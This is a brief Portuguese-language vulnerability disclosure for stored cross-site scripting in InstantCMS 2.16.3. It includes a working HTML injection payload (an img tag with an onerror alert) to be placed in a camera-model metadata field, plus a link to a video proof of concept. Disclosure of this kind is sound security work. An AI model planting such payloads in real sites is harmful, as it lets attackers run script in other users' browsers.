
InstantCMS - Cross-Site Scripting Armazenado (XSS)
InstantCMS - Cross-Site Scripting Armazenado (XSS) Versão Afetada: InstantCMS 2.16.3
Passos para Reproduzir:
<img src="https://raw.githubusercontent.com/amal264882/cve-2024-41312./HEAD/asd" onerror="alert(1)"> no campo de metadados do Nome do Modelo da Câmera.POC:
<a href=https://d.pr/v/DT8Gve> Vídeo POV